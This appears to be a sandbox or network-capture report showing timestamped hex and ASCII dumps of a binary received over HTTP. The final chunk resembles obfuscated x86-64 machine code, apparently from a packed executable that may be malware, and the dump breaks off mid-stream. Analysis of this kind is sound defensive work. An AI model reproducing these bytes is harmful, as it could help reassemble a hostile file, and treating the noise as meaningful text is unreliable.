                                                                                                                2022-10-13 11:07:30 UTC1935INData Raw: 85 d5 d3 e7 05 ee 55 a5 aa 19 e4 55 e4 28 f5 3c 55 1e e7 19 73 2a 71 ae 58 2f aa e0 f2 2f ae d5 f4 e1 64 c0 55 8f 92 32 6f 2a 78 7b 43 36 aa 0d 13 5d e2 d5 e1 83 59 62 2a e1 ad 54 09 aa b3 88 48 03 aa fa 22 a4 db aa d4 6d 48 94 d5 ab 44 09 c8 55 3a 39 fe 04 c3 07 b2 d4 1f e6 f1 59 5a ec c5 d5 66 08 2c 2e 28 05 b5 ea 56 6b 44 fd 92 25 3f 67 3c c8 99 bc 0c 77 2b b4 1f 96 7f f1 0c d2 f6 b0 c0 eb 4e a4 e7 52 cd fe 9f ea 25 67 07 af c3 5d 26 b1 58 51 ec b5 85 67 03 2c f6 00 04 be ea d3 db 45 f6 92 ed a7 66 37 c8 14 d4 0d 7c 2b b1 af 97 74 f1 34 1a f7 bb c0 56 8e 73 0d 6a 88 85 38 2b ea 17 10 61 8c 32 e6 68 45 ab d2 0e 7f 5b 6a 5c 3c 3c 8b 32 fb 5f f5 95 65 6b d7 e7 4a 8a 57 fd ff ae 35 27 14 61 22 01 6a 5f 0e c7 c4 b3 a5 a9 84 7e f0 0b 25 5d 70 01 d7 ba ac 01
                                                                                                                Data Ascii: UU(<Us*qX//dU2o*x{C6]Yb*TH"mHDU:9YZf,.(VkD%?g<w+NR%g]&XQg,Ef7|+t4Vsj8+a2hE[j\<<2_ekJW5'a"j_~%]p
                                                                                                                2022-10-13 11:07:30 UTC1951INData Raw: 1b df 55 04 13 4d 62 5f 3b 2e 39 d6 66 62 ee d2 82 bd dc d4 c6 71 5a 41 e9 b2 e3 d0 c4 54 e4 98 ef 90 e2 72 0f 7e 78 66 7c 2f 78 17 0d 5d 8b 6e f5 1c 8b f9 0d ff fe ff ff ff d9 ed ef 32 a0 1d 5c ee 92 cb fc 6b ed b2 7c b9 31 1e cd cc 92 00 e5 b2 c7 41 79 12 0d 66 9f f3 12 0d e4 34 0f e1 12 fa d4 cf 1a 0d 9f 68 c7 1d 4d cf bb fc e7 52 37 af 59 19 0d d5 87 47 1b 6d 01 06 70 18 4d 91 a3 2a eb 32 c5 60 1b 10 4d 1e 7b 62 e7 f2 58 ad e8 e7 f2 9e 76 14 14 ed b0 28 3a b8 ba ad fd 42 39 cc a6 a2 3c e4 4d d7 95 bb c6 5e 28 d6 c0 1b 5f cd 0b ca 1b 0e 48 ce cf 1b 5f 01 c9 cf 1b d6 b0 b5 4d 39 73 b7 d0 38 e4 53 31 15 b2 c6 b0 fa 24 40 39 2d fb 25 39 e4 b6 ac ce 3f e4 9b 15 f9 b8 c6 44 7a ba c3 1b d9 67 67 c9 1b 58 2a a2 cc 1b 59 7b a5 cc 1b 5c 6a d9 4e 39 f9 cd bc 3b
                                                                                                                Data Ascii: UMb_;.9fbqZATr~xf|/x]n2\k|1Ayf4hMR7YGmpM*2`M{bXv(:B9<M^(_H_M9s8S1$@9-%9?DzggX*Y{\jN9;
                                                                                                                2022-10-13 11:07:30 UTC1967INData Raw: 25 70 00 c9 9e 5d 7c 7e 3e 0c ec 9f ea 01 5e 2c 71 37 62 e3 ea 24 ac 23 ab 92 1f 50 00 6a c8 a6 e3 6b 21 2b 8b 60 f1 29 f1 3b 95 91 e6 c0 c1 d1 c3 b1 52 f2 01 f8 bc 25 68 a8 c8 95 5d 9c 1b de 60 15 a9 ae e4 3e 70 60 e9 eb ac fe ff ff 1f 61 02 9f d5 73 5a 20 cc 55 bc d9 76 63 2a bb c0 07 3a aa 16 68 19 ee d5 ca 98 1d 6e 2a e2 a6 10 05 aa 88 a3 0c 0f aa c9 19 e0 d7 aa 6b ae 0c 98 d5 70 97 4d c4 55 b9 8b 3a 45 2a 69 20 71 2b aa a6 e3 27 84 d5 c5 82 56 dd 55 98 a2 48 09 2a 9c ba 4c 89 d5 74 5c 41 e2 55 e2 b9 5d e8 55 2f 00 f7 19 c3 96 90 85 84 90 f5 4c b6 d3 db b8 2f 0b 15 3b 53 6e 43 6d e0 af 4d 82 37 39 3c 26 c9 d4 a4 ef bc c1 0e e4 2a dc 0e 3f cb fe 8e 59 ad ed 3e b5 54 da 07 a7 85 7d a2 d6 21 72 ef 13 00 f5 4d bd d3 c3 b0 2e 00 15 eb 13 6f 48 6d ad 17 4c
                                                                                                                Data Ascii: %p]|~>^,q7b$#Pjk!+`);R%h]`>p`asZ Uvc*:hn*kpMU:E*i q+'VUH*Lt\AU]U/L/;SnCmM79<&*?Y>T}!rM.oHmL
                                                                                                                2022-10-13 11:07:30 UTC1983INData Raw: e4 d2 66 b7 22 99 e3 06 0e 88 75 cb 20 35 06 be fc 0f 78 2b 37 b0 6b b5 3e 5c f9 85 4e b0 e4 bf c0 39 04 bb 62 6b 6d fb d2 ef 1e b1 32 f2 d6 98 46 51 b4 ea 2d 8e aa 15 f3 4d 57 bb 15 f3 84 3b d5 fc 82 21 f3 ee 76 46 5a 37 6b e9 ff ff 7f 7f c7 f9 8c 4c 95 2f 43 b8 45 d9 13 88 39 d8 d5 3f 35 0c 7e ef 85 48 d4 34 6b 16 00 00 80 a5 8e e3 8c 3e 67 38 e9 1b b3 e2 11 8a a0 26 07 15 8a fc 71 19 cb 16 00 00 80 79 db ef cc 37 1c 57 b2 4c b5 9a e7 b1 4c 2c 8b b1 0c 54 a1 92 4d cb a8 74 4c 73 5d 00 1d b1 34 8d ac ae 35 04 4c b0 1d f9 85 71 43 b7 8a 69 4f cb b4 16 4d 8b 17 00 00 80 49 3d e9 8c 70 d4 bb 00 f3 b9 27 00 b3 99 6c 32 02 76 7d 04 e0 55 a8 3d d3 17 3a 12 14 23 0e 29 56 fd 86 c9 d8 78 e9 25 e2 fc 05 75 74 fb 5e 01 f3 07 6a 5e 16 90 93 dd 04 7a 89 94 20 0f 88
                                                                                                                Data Ascii: f"u 5x+7k>\N9bkm2FQ-MW;!vFZ7kL/CE9?5~H4k>g8&qy7WLL,TMtLs]45LqCiOMI=p'l2v}U=:#)Vx%ut^j^z
                                                                                                                2022-10-13 11:07:30 UTC1999INData Raw: da fe 8f 2f 27 5d 50 89 0a 85 38 49 16 09 54 b8 9a 0c f5 f3 f3 b8 60 8d 54 7c 36 d5 e3 0e 6e 2d 35 9a b5 7c 2a 95 79 f4 cc c6 ea 11 28 40 33 15 5e 25 44 36 d5 d9 09 19 33 95 ca fd 67 cf aa 87 d7 47 c6 ca 57 ae 59 39 15 ee d8 79 39 15 8f c9 ca 3c f5 2e 0c c7 c3 ca 5e 07 d5 c4 6a 6c 2e 65 28 15 2b ca e9 dd ea 5b bf ed d8 2a 44 d3 b0 dd 6a d1 d7 ce 21 55 4d c5 ee 28 35 44 84 51 28 75 01 6c fb 1b bb e1 41 6c 39 aa d6 24 19 e4 ee d8 e1 93 c6 ad eb d0 61 39 e8 52 d1 18 e4 ef e5 3a 1e e4 ea 0c 0d 99 c6 19 3b 4e e2 1b a8 06 93 e8 1b e5 c3 56 ed 1b e0 b2 51 ed 1b 55 23 2d 6f 39 e0 24 48 1a e4 c0 a2 8d 90 c6 cf 81 bc 62 39 8e 10 bd 1b e4 91 af 56 1d e4 9c 4e 61 9a c6 f7 91 22 e1 1b ae 20 50 54 ed 97 34 70 3b 63 9e 23 3b 00 fe ff ff ff e5 0e e1 32 3d 1f 6e 1b 0d 6b
                                                                                                                Data Ascii: /']P8IT`T|6n-5|*y(@3^%D63gGWY9y9<.^jl.e(+[*Dj!UM(5DQ(ulAl9$a9R:;NVQU#-o9$Hb9VNa" PT4p;c#;2=nk
                                                                                                                2022-10-13 11:07:30 UTC2015INData Raw: 28 da d2 e2 08 01 a2 2b 0c ff 93 13 4d f8 c0 c1 d3 93 75 a3 7c 15 4e f6 e2 34 6d 28 d2 c1 f5 37 fc 29 aa be d4 21 8a 30 b6 0e dc 87 50 79 3f 9b fb 02 2e ad 48 5b 39 23 da 2a fa 09 0a a2 a3 64 fe 98 13 fd d8 c1 ca d3 ab b0 9a 58 6a 32 85 26 51 70 0c a1 f4 ac fe ff ff 4f 5b 2a f1 d5 59 2b b1 75 2a 25 4d bc 1e aa 4b 78 a0 14 aa 8e 2a 4c cc aa 08 fd a0 83 d5 e3 44 e1 df 55 b2 c8 96 5e 2a 92 b3 dd 30 aa 1d 40 8b 9f d5 22 59 fa c6 55 3b 29 e4 12 2a 93 c9 e0 92 d5 a7 ef ed f9 55 a1 aa f1 f3 55 14 88 1d 2b 55 fa 3f f1 64 2a 2d 8e b0 38 aa 84 aa c7 b9 d5 88 f7 1b 1b c3 fd c4 e2 1b d3 8e 97 3c 6d 60 ba b4 fd 37 a4 51 df b6 d4 39 d2 45 be 0e ac c7 25 71 3f fe 5b 77 26 ad 78 8b 4c 2b da df ca 7c 02 a2 7b 0c 8b 90 13 68 18 b4 c2 d3 83 c5 d7 7f 15 ce 56 96 37 6d e5 aa
                                                                                                                Data Ascii: (+Mu|N4m(7)!0Py?.H[9#*dXj2&QpO[*Y+u*%MKx*LDU^*0@"YU;)*UU+U?d*-8<m`7Q9E%q?[w&xL+|{hV7m
                                                                                                                2022-10-13 11:07:30 UTC2031INData Raw: 01 86 bf 00 28 7a 80 fa a4 40 b3 ea 4e 8c b8 39 a2 d3 e6 7d 60 05 35 6b 81 ed 8c 28 15 0b 87 5a 87 5f 93 5f f5 80 15 c5 59 0b 0b fd 8c 81 5f b8 60 fa af ea 09 d1 6f 66 2e 5d f3 99 3d 6d 81 00 72 91 e9 f4 04 c3 b1 9f cc 8b 65 81 26 ec aa e1 f4 58 fa 8d 9f bb fe b5 72 ce 8e 4d af a7 c4 bd 7e 2c 43 2c 15 d6 83 16 45 4f 0a 7c 29 b2 4d 08 4d 06 a9 90 d5 5c c2 bb 7b b8 82 86 86 d5 16 6b 75 83 85 c0 0f d6 f0 71 b2 9d 43 5a 6b 2e 97 68 ce 66 a5 fb 20 cf 00 54 1d 47 89 d6 c0 47 24 e8 2e 46 48 74 49 28 2c 1d 91 5d 2c da b2 97 12 c6 6f 09 ca c9 73 21 38 14 8e 80 ca 09 ae 78 aa 4d f9 32 51 88 13 f3 65 b2 81 d1 fd 52 ae a1 8f f2 95 43 f7 75 48 67 18 f0 4a 3e 6f be ed 28 43 81 32 52 ce 0a ca 90 4b 18 b9 cd 90 1b 62 da ea 48 30 d0 6e 0e 57 2b 05 82 d0 15 10 ef 8e 73 96
                                                                                                                Data Ascii: (z@N9}`5k(Z__Y_`of.]=mre&XrM~,C,EO|)MM\{kuqCZk.hf TGG$.FHtI(,],os!8xM2QeRCuHgJ>o(C2RKbH0nW+s
                                                                                                                2022-10-13 11:07:30 UTC2047INData Raw: 4f 96 80 ad cc 06 04 8b 71 11 9a 8c 55 28 74 a5 dd 37 60 22 69 60 00 b4 47 a1 29 a5 57 34 bb d2 92 62 f6 1d 01 9d 3f 2a ac dc 51 4b 91 aa cd 80 f0 c3 24 b4 62 19 21 b3 25 e3 cd 3a ca a0 c7 56 ea 00 2f d8 15 c9 4e 33 6d 38 81 db d0 b2 f1 dc 37 43 a3 2c 9a a6 29 77 f4 4c 27 17 80 c7 b0 21 d1 e5 66 75 75 5a 1b 17 fe 72 71 e6 df 46 41 e8 70 80 1c de a8 66 07 b8 6b c1 bf 0f 0d a4 6f 7a 03 2a 58 a6 3f 69 d0 f2 89 fd 5f d4 31 bb 9e a1 b4 13 d0 13 9a 36 2b cb 26 01 2d 1c 4c e7 fb a0 aa 76 ca 55 7c 0b 49 4d 04 f5 9c a3 e5 3e 7e fc 22 9e 1a 6b d9 95 e7 67 95 86 2e f6 48 c5 98 33 9d 3d b0 6f 2c 15 b1 1c 77 65 1b 44 21 81 3b e4 6b 7d 5e 9a 44 b3 af 41 4d 1d 9f 0b 91 be e7 b7 f2 48 f5 cd 9b 37 d2 f7 f6 4f 1c ae f9 9c 53 8a 3b 25 ce bb 1b b9 7d a4 b7 fe 3a 29 32 a8 42
                                                                                                                Data Ascii: OqU(t7`"i`G)W4b?*QK$b!%:V/N3m87C,)wL'!fuuZrqFApfkoz*X?i_16+&-LvU|IM>~"kg.H3=o,weD!;k}^DAMH7OS;%}:)2B
                                                                                                                2022-10-13 11:07:30 UTC2063INData Raw: b9 cd 2a 26 30 b9 f2 bf 6f 71 a3 7a cd 92 9f bc 39 89 df a8 af 9d e8 f1 df c2 c6 99 09 8b d5 b0 bd 62 52 a4 21 56 d5 45 33 98 53 a1 99 eb 5a 03 eb 42 fb 1d 98 55 ed a2 b8 f9 42 52 2b 92 e4 25 ce 25 15 e3 03 4d dd a7 e1 a6 4b 82 d1 e8 5e af f5 69 2e 53 4c 3f 52 d7 e8 0f ee b4 76 55 2e b3 82 f6 b8 94 dc da e2 4e ac c0 44 1d 4c 06 3a 5b 23 45 74 c0 39 5a 59 99 3e 70 03 96 79 e3 7b 21 d8 3e 42 43 27 23 ac ea a4 1c 8a 5d 41 35 36 31 2d 89 bd 2d 49 5e d2 25 b3 8b f4 94 31 2b d1 e6 33 b2 8a b5 7c 17 34 37 e7 bf ff f6 ff 2d 23 ce 54 4d a0 62 f8 bb 81 8d c3 3d ea 1e e5 39 13 57 da b2 fe bf 82 d9 39 22 29 7a 4b 92 63 9b 3f b1 54 1e 14 94 0e 0f 87 bb 2f ce c1 ef 8c 87 b4 e0 e7 f1 d5 f8 0a 7c 2d af b4 99 b6 bc b6 96 8d b7 69 e7 09 e5 15 cf 5a cd b2 f3 93 8f ce 39 46
                                                                                                                Data Ascii: *&0oqz9bR!VE3SZBUBR+%%MK^i.SL?RvU.NDL:[#Et9ZY>py{!>BC'#]A561--I^%1+3|47-#TMb=9W9")zKc?T/|-iZ9F
                                                                                                                2022-10-13 11:07:30 UTC2079INData Raw: 4e 35 c6 30 2e 73 31 19 b8 bf 88 0a 1c ba bf b7 d5 d5 cf 26 ba 97 38 2e 92 3e be bf fe ff ff ff 8a 1c 21 61 59 a2 b2 1f b9 36 2b c1 2e 27 bd ba c7 b3 c9 c2 cf d1 db 3c e7 eb 2e 8a 8a bc 9f b4 1d fa 78 db b9 bf fc db b9 bf fe ff ff ff 43 87 26 e1 02 5a 25 b0 9f 13 90 38 d1 f4 e2 6f 41 99 10 9c fe cd c6 4b 20 c5 7d 40 3d d1 20 a5 7e 24 d1 72 c4 d4 49 40 71 ba 07 b7 bf 2e f0 4a a0 ff ab 3d d4 d1 09 bc 7c 23 2e d6 3f 08 ad bf c4 c5 8e 56 40 b5 23 19 90 f7 7f 28 dc 2e 78 32 a8 bf 01 00 00 00 b6 81 09 e1 a5 a9 af df bb 5e 24 21 2e d9 53 45 a7 3d 5f 3a c2 d1 28 af 4e 40 01 00 00 00 ba fa 2d df 90 ed 47 38 d1 8a d4 cb 2e c4 1f 46 28 d1 24 0f 2c 3f fc ff ff ff d1 a9 6d 5f 0c af 61 1c 00 64 d8 02 0c 00 6c cc 7f 30 ec c8 31 71 91 77 e4 94 8f 52 e2 f9 8d 6e af 4f 2f
                                                                                                                Data Ascii: N50.s1&8.>!aY6+.'<.xC&Z%8oAK }@= ~$rI@q.J=|#.?V@#(.x2^$!.SE=_:(N@-G8.F($,?m_adl01qwRnO/
                                                                                                                2022-10-13 11:07:30 UTC2095INData Raw: aa 56 40 e3 ba d5 16 33 a8 d4 55 6d 60 fe 7b 2a 26 2d 1f 1c c3 11 e7 64 69 3e c7 34 a1 17 9a b2 a5 86 1f 80 46 53 18 aa 01 4d 24 44 7f 02 c6 70 6a 87 90 6d 91 48 c2 6a ab cd c7 69 d5 f0 b5 c8 d2 15 3e 7d 5f 7a 6f 1f 6c 0a 28 23 f5 ae 2e 52 6f 66 cd b7 4b 4d 72 1c 02 1a d2 1a f6 7c a7 16 4d 00 e0 72 15 c6 3c b6 8a 87 6d 25 ac cf 7d ab 41 1b 64 c2 f0 48 f4 df 02 3e 30 b3 77 78 1f 50 96 25 34 f5 4a 3b f3 6d 04 82 11 de 52 0c 5d 68 1e f4 fe ff ff ff 08 cc a8 3b 8b e4 65 3e 4d 05 82 e2 51 44 65 2b 95 ce 32 5c 96 74 33 cd 55 74 4f 55 44 89 dc a5 52 c4 8e 36 c2 c2 b2 d2 80 bd 3e 4d 8a 0e cd cf b2 16 17 bf a8 3b 81 ad 84 a9 bb 17 b8 e0 3f 4d 59 9e 67 50 44 79 e7 10 cf 32 90 ba f1 32 cd 69 60 ca 54 44 8d f0 20 53 c4 92 62 47 c3 b2 06 07 f3 25 be 70 8a 94 19 1b b1
                                                                                                                Data Ascii: V@3Um`{*&-di>4FSM$DpjmHji>}_zol(#.RofKMr|Mr<m%}AdH>0wxP%4J;mR]h;e>MQDe+2\t3UtOUDR6>M;?MYgPDy22i`TD SbG%p
                                                                                                                2022-10-13 11:07:30 UTC2111INData Raw: fb d8 f4 da ca 27 27 0b c9 20 26 50 ea 09 d1 6f 92 fe 87 8c b6 f3 07 c9 56 a3 e6 16 0d 44 78 bb c8 49 79 fe 3d 21 ba 7c 3e 7b 45 19 0f 72 b1 d7 8c a5 58 1d dd a7 31 e5 26 c7 72 3b fe 3d 44 96 d3 46 85 eb c3 ba f4 b1 14 fc 4d 36 73 25 d3 56 93 d6 34 17 44 d8 1b ea 53 79 76 b5 03 a0 7c ae eb 67 03 0f 6a a9 f5 96 a5 20 65 c9 33 2d 5e c6 05 65 b7 93 04 d8 f4 74 6f f1 c9 f4 1b 2c b5 c4 f4 10 7e 20 07 0b b2 21 9a 2a 0b 55 71 21 d6 f4 7c 1d 9d d9 f4 78 c8 91 2f 0b 47 ee 93 31 0b 99 98 b6 26 0b 15 43 cb e6 f4 c1 75 12 28 0b 86 a1 e7 39 0b d9 fa a3 34 0b 5e 98 36 f7 f4 44 e7 8c da f4 97 bf 37 26 0b ce 2b 8b 29 0b 1a f8 75 dd f4 92 93 d3 ef eb 09 d1 6f c3 e2 73 33 28 1b 62 3d 4b e7 3b e5 47 54 1b 33 2b 4b a8 6b 5f 34 8c 7a 57 99 ca b4 db 18 db 8e c4 f6 17 d2 23 4b
                                                                                                                Data Ascii: '' &PoVDxIy=!|>{ErX1&r;=DFM6s%V4DSyv|gj e3-^eto,~ !*Uq!|x/G1&Cu(94^6D7&+)uos3(b=K;GT3+Kk_4zW#K
                                                                                                                2022-10-13 11:07:30 UTC2127INData Raw: bd 38 0b e3 75 85 d6 f4 20 03 10 ef eb 09 d1 6f de 81 44 f3 e7 8b e1 1c 4b a3 60 86 1d 05 d1 94 79 22 f2 13 56 48 0d e9 ae eb 59 c9 fb d5 16 87 8d c6 8b 48 6e 7e c3 eb ae 0a dd b0 3f fc 98 48 1a 75 30 92 63 8e c0 03 88 b6 84 c3 00 0b 52 6c d3 10 a4 07 05 71 34 5b 38 f2 fb be 6a 17 e9 6e 2b 7b d3 fb 2d ee a5 97 c6 f3 30 4c 64 c3 23 66 28 c7 b0 0f cc ba 52 1a 65 20 9f e2 42 a6 37 6b 0c 25 83 ea cf 6f 7a 85 4a a7 3a 8a 66 db ef 3b 39 73 00 0f 6f 94 50 51 d2 13 45 e8 bd 72 78 c1 ff 69 f3 ee ee 40 04 a8 42 33 49 c8 32 09 a4 cf 96 9b 4e 06 02 f4 d9 d8 87 df 29 c8 6f 34 31 89 a0 3a 26 32 18 e8 3b 73 3f c3 08 6f e4 2c 92 d5 13 59 14 7e 75 78 29 13 aa f4 ee 1c b4 c7 af 42 ef 32 f4 2e 95 2a ad 50 2a 0e 61 67 4e 40 05 3d af 8c 2d 5d d8 6a 6e b6 35 1e 95 b4 d2 3a 29
                                                                                                                Data Ascii: 8u oDK`y"VHYHn~?Hu0cRlq4[8jn+{-0Ld#f(Re B7k%ozJ:f;9soPQErxi@B3I2N)o41:&2;s?o,Y~ux)B2.*P*agN@=-]jn5:)
                                                                                                                2022-10-13 11:07:30 UTC2143INData Raw: 0a b2 a7 e2 9b 60 79 f5 5e f8 c3 ae a5 83 cb f4 39 b7 16 08 0b 2f 40 ac 25 0b 50 d8 17 d9 f4 81 1c ab d6 f4 61 f9 a7 20 0b c6 bf a5 3e 0b c0 d9 80 29 0b 30 ca fd e9 f4 5c d4 24 27 0b 2f 10 d1 36 0b 5c 23 95 3b 0b 9b 79 00 f8 f4 b5 26 ba d5 f4 12 f6 01 29 0b eb ba bd 26 0b 9f ef b1 d0 f4 74 e1 b3 ce f4 aa 17 5c c9 f4 de ce de ef eb 09 d1 6f 30 32 78 f3 17 db f4 22 4b a6 8c a5 47 f5 ea 16 ce b4 f1 32 ac 8f 4e 4e ad 16 1d 4b 22 e1 7a 36 81 89 a8 bb cf b4 14 51 cd 4d 5b 86 be 6f 0b 4b 1a d9 09 ed 1a 4e 6e 21 3e 4b 09 13 9c fa b1 a5 14 58 f1 b1 0c a1 7a 96 99 57 26 31 4b 81 52 1b 49 e6 d1 2e e8 96 fa 8b 95 34 bc 76 c8 b4 43 01 c7 05 11 fa 80 b6 19 17 97 69 aa d0 7e 1a 2b 6e e2 d4 b7 fe b5 63 70 31 65 7d e9 b4 4a b8 cf ef eb 09 d1 6f 69 10 96 0c 91 6a aa 94 cd
                                                                                                                Data Ascii: `y^9/@%Pa >)0\$'/6\#;y&)&t\o02x"KG2NNK"z6QM[oKNn!>KXzW&1KRI.4vCi~+ncp1e}Joij
                                                                                                                2022-10-13 11:07:30 UTC2159INData Raw: 21 bc 8f fa 09 1e 07 ff ff ff ff df 57 25 ea 15 06 34 a4 cd 30 c4 d1 15 86 2b 84 bd 69 45 1c 8c 8f 0b 57 13 07 00 00 00 00 2a 22 31 ea 4c 60 0c 0f 4a 8d e7 0b 95 ad 57 21 2b c8 89 36 f7 7e ab 00 f2 8e 22 84 95 28 05 3a c1 15 67 d6 37 bd 32 be 06 ea 95 40 da 83 f6 54 70 e6 e0 ff 18 8f b5 52 e5 5d 02 ea db e0 c3 df b3 1e ce 88 8f 1c 61 1a 07 ff ff ff af 14 fe 01 f9 41 6b 62 9e 95 3d f2 f9 ee 65 63 93 b5 8f 48 4a 14 07 00 00 00 50 e7 35 b3 95 65 0f c7 f5 62 58 ed 8c 4f 3d 46 81 55 3f 22 72 fb 29 1b 60 53 68 86 95 25 8e 2d 54 00 19 8c a6 9d f4 31 3c d8 80 90 9d 95 ea 36 85 6a dd ac 7d c0 15 9a 59 55 51 00 5d 61 bc dc 48 8b b8 2a 2c 9e 82 05 bd 1b b7 09 e9 d0 15 33 f0 bd 9e 8f ee 19 04 53 fe ff ff 6f 09 bd ee 55 f7 e5 9e 5e 2a b3 96 d5 30 aa 38 65 83 9f d5 37
                                                                                                                Data Ascii: !W%40+iEW*"1L`JW!+6~"(:g72@TpR]aAkb=ecHJP5ebXO=FU?"r)`Sh%-T1<6j}YUQ]aH*,3SoU^*08e7
                                                                                                                2022-10-13 11:07:30 UTC2175INData Raw: 01 c4 ec 09 7a 87 21 f0 88 ff 4f 11 cc 53 4a 82 77 b3 53 b1 0c eb bd 7e 69 55 c6 d5 05 a2 c5 92 e6 b4 12 40 10 0a 3d d1 a1 5d 71 be 1f ac 0d 1d 92 08 e4 e2 bf 36 28 5a 3a 23 58 8e 08 5b 14 a3 cd 3b 11 07 78 bb 39 02 ea 4c 28 ec 4e 76 52 02 7f 69 53 e8 ce d0 15 7a bb 69 a8 40 5d 05 35 39 7d e8 b3 19 8d 53 47 04 a0 ff 00 00 00 00 41 83 7c 5d 77 5d c0 ab f1 10 e5 8a a2 00 81 b9 b9 c8 de e1 4d ac 13 1e 40 00 ff ff ff 7e 4c b8 08 7a c6 39 7f 60 1b 63 c7 46 60 67 13 41 8e c7 17 25 13 dd f2 e9 47 93 0b 33 e1 23 c3 42 52 de c0 4d c8 8a 30 cf cc 9e 0a 01 fc d3 1e 38 77 0e 1f 7a 32 ca b5 5b 5d 81 23 69 41 eb 5f 48 94 a2 f2 a1 f3 97 e4 41 fa be 53 57 8c 42 00 ff ff ef d4 17 01 1a 7a 06 a5 f2 ab ff 4f 5e 17 3f 4a 9b 9d 2b 2a 9e 9e 9d fa 85 5e 0f b8 a5 e4 89 7d 9e 53
                                                                                                                Data Ascii: z!OSJwS~iU@=]q6(Z:#X[;x9L(NvRiSzi@]59}SGA|]w]M@~Lz9`cF`gA%G3#BRM08wz2[]#iA_HASWBzO^?J+*^}S
                                                                                                                2022-10-13 11:07:30 UTC2191INData Raw: b3 8b 20 ce ea e9 aa 16 97 8f dd 24 05 53 fe ff ff 6f 51 be ec 55 af 1c 69 dd 55 26 18 1e 5c 2a 5a 73 55 32 aa b1 c8 03 9d d5 fa b1 72 c4 55 83 a1 6c 10 2a 03 51 68 90 d5 4b 2f 65 fb 55 5d 42 79 f1 55 f0 68 95 29 55 26 f7 79 66 2a 45 86 38 3a aa 54 32 4f bb d5 64 41 04 d5 55 13 1a 52 7a 2a e8 e3 23 23 aa 35 4b 3d f7 d5 ad c3 39 77 2a 15 38 d4 1d c3 02 ee 63 62 34 d0 03 ac 1e a6 b9 c3 2e 2f e4 0e 2a 5f 98 ad d0 75 dc 0e 2f 25 17 9e 98 a6 00 ca 8f 2f dd d6 6a e7 7a d9 35 fb af 7b 2e 70 20 4f 2f e5 3b 71 92 53 42 f3 9d 32 38 da e4 49 b3 ae af 13 24 e8 02 24 4a e8 72 49 f7 8c b6 db 0e 5b 59 d4 99 98 98 d4 09 88 2f 27 da a9 e0 7a fd 19 38 a8 7b 38 94 e3 48 2f 79 bf b2 95 53 d2 67 5e 35 38 0c 21 e7 60 d5 93 a4 4e 6c 4e 61 5e 50 b7 05 1d af 8c ed 24 c3 6a 3d 99
                                                                                                                Data Ascii: $SoQUiU&\*ZsU2rUl*QhK/eU]ByUh)U&yf*E8:T2OdAURz*##5K=9w*8cb4./*_u/%/jz5{.p O/;qSB28I$$JrI[Y/'z8{8H/ySg^58!`NlNa^P$j=
                                                                                                                2022-10-13 11:07:30 UTC2207INData Raw: 9c 2e f9 49 7b 70 4b 39 05 7c d1 4b ae c0 b4 ae 1f 37 01 1a 30 b5 af be 86 b2 9c d1 f2 11 93 c0 fc ff ff ff 33 36 d5 20 f1 f9 8c 42 00 44 45 2d 70 2a 4d aa c1 91 c1 61 d4 6d 74 3f 92 be 07 47 b9 5f 47 9a a0 dc 6e 89 b9 b4 87 6e 14 47 32 91 ce 3f 84 bd ff 85 02 43 78 70 b4 74 ca 6e 2b 7e 33 e5 6e ed a3 fd 5d 00 46 9e 86 a5 ff 5b 7d cd 5c 00 d8 ce 26 a7 ff cf ce f9 ad ff 39 15 7b aa ff e8 33 b6 47 00 94 8f 44 4c 00 38 18 ca b0 ff b1 9b 0b 4e 00 7e c8 39 44 00 01 e7 92 44 00 3e b2 e9 bc ff 67 71 a2 45 00 90 3a 49 be ff c3 2a 96 b4 ff 9d 71 14 b3 ff bc 37 d9 5e 00 84 b3 2b 55 00 64 19 a0 a2 ff c9 9a fd 93 4c a4 cf c4 2e 98 1e 34 ed 2e ed de cc 33 2e 63 19 a4 36 d1 f0 50 ec dc 2e cd 33 a6 ce 2e 6b f1 06 2e 2e 60 ed 6b 37 d1 3c 19 cc 30 2e 54 de 02 36 d1 61 b0
                                                                                                                Data Ascii: .I{pK9|K7036 BDE-p*Mamt?G_GnnG2?Cxptn+~3n]F[}\&9{3GDL8N~9DD>gqE:I*q7^+UdL.4.3.c6P.3.k..`k7<0.T6a
                                                                                                                2022-10-13 11:07:30 UTC2223INData Raw: a9 7e b1 17 74 5c 83 28 96 c7 03 5e 71 91 e5 5f 45 e1 42 37 62 61 38 96 e3 7c 5c d4 9a 94 c7 ea 90 73 11 f4 ea 93 8f 2e 5f 63 20 93 a3 6b c2 69 38 a3 88 6a 29 86 31 b5 65 5c bd 2e 8d c7 5e aa 93 16 18 aa b2 0b bd 96 cf 86 c7 40 ff 6f 91 40 65 4f ee 42 15 0a 62 38 da 53 7c e9 08 94 74 8d 5c bc eb 90 c7 96 6e 92 56 03 ec 6e 9b a3 72 a3 7e 38 45 82 9f 5c 07 9a 88 c7 f5 39 30 7e 59 3c 94 16 2b 63 94 90 a3 2b fc 73 38 24 a7 9c ee d3 29 48 0c bd e3 a3 8f c7 87 27 ab 62 1c 30 af 78 7e 0c 43 15 2d 8c bc 4d 95 b4 01 00 00 00 cf 4d d3 ab d1 43 77 4b ff ff ff ff 4f 2b 51 04 54 8c bc 2b e3 b9 b1 c6 72 49 8e 52 39 ce 29 42 3a 69 47 ec cb 96 02 4e 86 27 78 50 0f ca 2e 74 fb 87 cb e3 95 ca 2e 78 3d f5 96 db 4e 55 2e 0b 00 00 00 00 45 24 48 78 76 be e8 c6 f2 1e 64 54 6f
                                                                                                                Data Ascii: ~t\(^q_EB7ba8|\s._c ki8j)1e\.^@o@eOBb8S|t\nVnr~8E\90~Y<+c+s8$)H'b0x~C-MMCwKO+QT+rIR9)B:iGN'xP.t.x=NU.E$HxvdTo
                                                                                                                2022-10-13 11:07:30 UTC2239INData Raw: f6 d1 80 e9 ba 80 fa 67 32 d9 44 2a c4 49 81 e9 02 00 00 00 66 41 89 09 44 8b 07 48 81 c7 04 00 00 00 66 41 81 fa 6f 5c e9 da 40 0f 00 33 c3 e9 df 75 0c 00 48 81 ee 01 00 00 00 44 0f b6 0e 41 0f b7 fc 66 45 0f be d0 41 8b fa 45 32 cb 44 86 d7 41 fe c1 41 80 f1 5b 66 44 0f b6 d6 f5 41 d0 c9 49 0f bf fd 41 fe c1 40 d2 d7 41 d0 c9 66 41 0f ba f2 74 48 c1 cf 16 45 32 d9 66 46 0f b6 14 0c 66 44 85 d4 49 0f 47 ff 48 f7 d7 48 81 ed 02 00 00 00 45 84 ea 44 0f b3 df 66 44 89 54 25 00 66 ff c7 e9 1f cb 06 00 48 8b 16 4c 8b 5e 08 fe cd 0f bf cd 0f a3 f1 48 81 c6 10 00 00 00 4c 89 1a 49 81 e8 04 00 00 